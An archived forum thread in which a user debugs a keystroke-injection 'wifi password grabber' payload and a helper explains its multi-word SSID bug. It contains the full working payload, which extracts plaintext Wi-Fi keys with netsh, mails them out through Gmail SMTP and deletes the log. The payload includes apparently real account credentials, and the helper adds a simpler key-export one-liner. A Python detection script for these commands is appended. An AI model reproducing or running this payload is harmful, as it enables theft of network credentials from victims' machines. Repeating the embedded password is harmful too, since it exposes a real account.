rainbowtornado Posted January 29, 2022

tryna run wifi pw grabber. Email gets sent to designated address, but here's what's in the attached txt file with the email:

SSID: get (first word of network name is 'get' so makes sense)
Network Type: %NETTYPE%
Authentication: %AUTH%
Password: %KEY%

Can anyone help me here? It took me hours to successfully edit the script to get the email sent at all. Total newb here. If anyone can help me figure out why it's not finding the values of these fields included in the email doc, I'm obliged.

dark_pyrro Posted January 29, 2022

To be able to troubleshoot, it would be good to know what the actual payload looks like.

rainbowtornado Posted January 29, 2022 Author

C:\Users\computer>cd "%USERPROFILE%\Desktop"

C:\Users\computer\Desktop>for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "B"') do set SSID=%A

C:\Users\computer\Desktop>set SSID=get

C:\Users\computer\Desktop>netsh wlan show profiles %SSID% | findstr "Network type" | findstr /v "broadcast" | findstr /v "Radio">Temp.txt

C:\Users\computer\Desktop>for /f "tokens=3 delims=: " %A in ('findstr "Network type" Temp.txt') do set NETTYPE=%A

C:\Users\computer\Desktop>netsh wlan show profiles %SSID% | findstr "Authentication">Temp.txt

C:\Users\computer\Desktop>for /f "tokens=2 delims=: " %A in ('findstr "Authentication" Temp.txt') do set AUTH=%A

C:\Users\computer\Desktop>netsh wlan show profiles %SSID% key=clear | findstr "Key Content">Temp.txt

C:\Users\computer\Desktop>for /f "tokens=3 delims=: " %A in ('findstr "Key Content" Temp.txt') do set KEY=%A

C:\Users\computer\Desktop>del Temp.txt

C:\Users\computer\Desktop>echo SSID: %SSID%>>Log.txt & echo Network type: %NETTYPE%>>Log.txt & echo Authentication: %AUTH%>>Log.txt & echo Password: %KEY%>>Log.txt

C:\Users\computer\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\computer\Desktop> $SMTPServer = 'smtp.gmail.com'
PS C:\Users\computer\Desktop> $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
PS C:\Users\computer\Desktop> $SMTPInfo.EnableSsl = $true
PS C:\Users\computer\Desktop> $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('my email@gmail.com', 'mypassword');
PS C:\Users\computer\Desktop> $ReportEmail = New-Object System.Net.Mail.MailMessage
PS C:\Users\computer\Desktop> $ReportEmail.From = 'myemail@gmail.com'
PS C:\Users\computer\Desktop> $ReportEmail.To.Add('myemailsentto@gmail.com')
PS C:\Users\computer\Desktop> $ReportEmail.Subject = 'WiFi'
PS C:\Users\computer\Desktop> $ReportEmail.Body = 'The log is attached!'
PS C:\Users\computer\Desktop> $ReportEmail.Attachments.Add('Log.txt')
PS C:\Users\computer\Desktop> $SMTPInfo.Send($ReportEmail)
PS C:\Users\computer\Desktop> exit

rainbowtornado Posted January 29, 2022 Author

Using the wifi password grabber payload off GitHub. Any help/feedback appreciated.

DELAY 2000
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 1000
REM --> Change directory (you can change this to something else to make less visible)
STRING cd "%USERPROFILE%\Desktop"
ENTER
REM --> Get SSID
STRING for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "B"') do set SSID=%A
ENTER
REM --> Get network type
STRING netsh wlan show profiles %SSID% | findstr "Network type" | findstr /v "broadcast" | findstr /v "Radio">Temp.txt
ENTER
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" Temp.txt') do set NETTYPE=%A
ENTER
REM --> Get authentication
STRING netsh wlan show profiles %SSID% | findstr "Authentication">Temp.txt
ENTER
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" Temp.txt') do set AUTH=%A
ENTER
REM --> Get key
STRING netsh wlan show profiles %SSID% key=clear | findstr "Key Content">Temp.txt
ENTER
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" Temp.txt') do set KEY=%A
ENTER
REM --> Delete Temp.txt
STRING del Temp.txt
ENTER
REM --> Create Log.txt
STRING echo SSID: %SSID%>>Log.txt & echo Network type: %NETTYPE%>>Log.txt & echo Authentication: %AUTH%>>Log.txt & echo Password: %KEY%>>Log.txt
ENTER
REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('earlreallong99@gmail.com', 'Tempy22Lily');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'earlreallong99@gmail.com'
ENTER
STRING $ReportEmail.To.Add('reallong99@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi'
ENTER
STRING $ReportEmail.Body = 'The log is attached!'
ENTER
STRING $ReportEmail.Attachments.Add('Log.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING exit
ENTER
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

dark_pyrro Posted January 29, 2022

I can't see why that shouldn't work. You say this though: "get (first word of network"... Is "get" the SSID, or are there more words/chars in the SSID? If the SSID is not present, then the variables will be set as you get them in your result file, meaning NETTYPE will be %NETTYPE% in the result file if there is no SSID that you can obtain the NETTYPE from.

It's also a rather cumbersome way of doing it. Why not just use:

netsh wlan export profile key=clear

rainbowtornado Posted January 29, 2022 Author

full ssid is 'get your own', only word 'get' appears in email tho

dark_pyrro Posted January 29, 2022

Exactly! My guess is that there is a flaw/bug in that payload making it only "compatible" with SSIDs that are "one word only"; SSID = "oneword" works, SSID = "two words" does not. In your case, SSID = "getyourown" is OK, whereas SSID = "get your own" isn't working, since the payload script seems to just grab "get" as the SSID name. When the script continues to execute, it can't find any SSID named "get", hence not getting any information to store in the coming variables, which makes (for example) NETWORK to be %NETWORK%, and that is what you see in the result file that is emailed to you.

rainbowtornado Posted January 30, 2022 Author

oh wow thank you vvererrrrry much mi amigo

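A defender-side check for the commands discussed in this thread, as an added example that is not part of the original posts: it scans process-creation command lines (for instance from Sysmon Event ID 1 or Security Event 4688 with command-line auditing) for `netsh wlan` invocations carrying `key=clear`. The event records, host names, user names and field names are constructed for illustration.

```python
import re

# netsh requests that print or export stored Wi-Fi keys in plaintext:
#   netsh wlan show profile(s) ... key=clear
#   netsh wlan export profile ... key=clear
# [^|&]*? keeps the match inside one command of a pipeline or chain.
KEY_CLEAR = re.compile(
    r"\bnetsh(?:\.exe)?\s+wlan\s+(show|export)\s+profiles?\b[^|&]*?\bkey\s*=\s*clear\b"
)

def normalize(cmdline):
    """Drop cmd.exe caret escapes and quotes, collapse whitespace, lowercase."""
    cleaned = re.sub(r"[\^\"']", "", cmdline)
    return re.sub(r"\s+", " ", cleaned).strip().lower()

def find_wifi_key_dumps(events):
    """Return (host, user, action) for each event whose command line matches."""
    hits = []
    for ev in events:
        match = KEY_CLEAR.search(normalize(ev["cmdline"]))
        if match:
            hits.append((ev["host"], ev["user"], match.group(1)))
    return hits

# Constructed sample events; hosts, users and field names are hypothetical.
SAMPLE_EVENTS = [
    {"host": "WS-01", "user": "computer",
     "cmdline": "netsh  wlan show profiles get key=clear"},
    {"host": "WS-01", "user": "computer",
     "cmdline": "netsh wlan show profiles get"},
    {"host": "WS-02", "user": "alice",
     "cmdline": r"C:\Windows\System32\netsh.exe WLAN Export Profile key=clear folder=C:\Temp"},
    {"host": "WS-03", "user": "bob",
     "cmdline": 'cmd.exe /c "netsh wlan show profile name=^"get your own^" key=clear"'},
    {"host": "WS-03", "user": "bob",
     "cmdline": "netsh wlan show interfaces"},
]

if __name__ == "__main__":
    for host, user, action in find_wifi_key_dumps(SAMPLE_EVENTS):
        print(f"ALERT host={host} user={user} netsh wlan {action} key=clear")
```

Profile queries without `key=clear` and `show interfaces` are left unflagged, so the rule fires only on requests for the plaintext key.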
Archived
This topic is now archived and is closed to further replies.